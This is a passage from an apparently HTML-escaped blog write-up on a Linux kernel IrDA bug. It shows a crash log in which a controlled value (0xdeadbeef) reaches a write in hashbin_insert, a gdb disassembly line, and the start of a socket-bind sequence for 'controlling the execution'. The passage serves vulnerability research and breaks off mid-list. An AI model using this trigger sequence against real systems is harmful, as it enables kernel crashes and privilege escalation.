class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235f08318 <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235e73120 <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-14\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235585be9 <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880235e73131<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-15\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffc90001697df0 <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff88023fc1aaa0 <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff8802349fa680<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-16\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880235fab420 <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffff880234993ac0 <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffff880235f08300<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-17\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000202<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000003<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000063<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-18\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">FS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000001d30880<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">GS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-e\">ffff88023fc00000<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">knlGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-19\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0010<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ES<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000080050033<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-20\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000235ea3000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR4<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000000006f0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-21\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR0<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR1<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-22\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR3<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR6<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000fffe0ff0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">DR7<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000400<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-23\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Call <\/span><span class=\"crayon-v\">Trace<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-24\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">irias_insert_object<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x19<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x20<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-25\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">irda_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x17a<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1c0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-26\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">security_socket_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x3e<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x60<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-27\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SYSC_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0xb0<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xe0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-28\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">vfs_write<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x155<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x1b0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-29\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">do_nanosleep<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x56<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xf0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-30\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SyS_write<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x41<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0xa0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-31\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SyS_bind<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x9<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-32\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">entry_SYSCALL_64_fastpath<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x13<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x94<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-33\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0033<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0x44a117<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-34\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">002b<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00007ffdb85d5f58<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">EFLAGS<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000287<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ORIG_RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000031<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-35\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RAX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ffffffffffffffda <\/span><span class=\"crayon-v\">RBX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006b68d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RCX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000044a117<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-36\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDX<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000024<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00007ffdb85d5f90<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RDI<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000006<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-37\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RBP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000070<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000048eb5a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R09<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">000000000000000c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-38\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R10<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R11<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000287<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R12<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006b6880<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-39\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R13<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000065<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R14<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000006b68d8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">R15<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0000000000000000<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-40\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Code<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">7b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ba<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">20<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ce <\/span><span class=\"crayon-i\">e8<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">42<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bf <\/span><span class=\"crayon-e\">af <\/span><span class=\"crayon-i\">ff<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">49<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">63<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c6<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">49<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8d<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">04<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">c4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">85<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">d2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">74<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">6e<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">53<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">50<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">48<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">89<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-41\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RIP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">0x150<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">RSP<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ffffc90001697dc0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-42\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">CR2<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">00000000deadbeef<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-43\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">end<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">trace<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8a8070c4e016c09c<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-o\">&#8211;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-44\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Kernel <\/span><span class=\"crayon-v\">panic<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">syncing<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Fatal <\/span><span class=\"crayon-i\">exception<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-45\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Kernel <\/span><span class=\"crayon-v\">Offset<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">disabled<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-46\"><span class=\"crayon-sy\">[<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">3.900038<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Rebooting <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">seconds<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f35a338338997-48\"><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">x<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">i<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">0x99<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f35a338338997-49\"><span class=\"crayon-cn\">0xffffffff81847839<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">hashbin_insert<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">153<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">mov <\/span><span class=\"crayon-e\">QWORD <\/span><span class=\"crayon-i\">PTR<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdx<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">rbx<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0188 seconds] -->  <\/p>\n<p>So Here the process of controlling the execution:<br \/> &#8211; Create 4 socket files via socket()<br \/> &#8211; bind socket 1 to 3 , this will allocate and insert objects into irias_objects<br \/> &#8211; bind 1 again , this will trigger the first bug<br \/> &#8211; insert socket 2 &amp; 3 many times (~5)<br 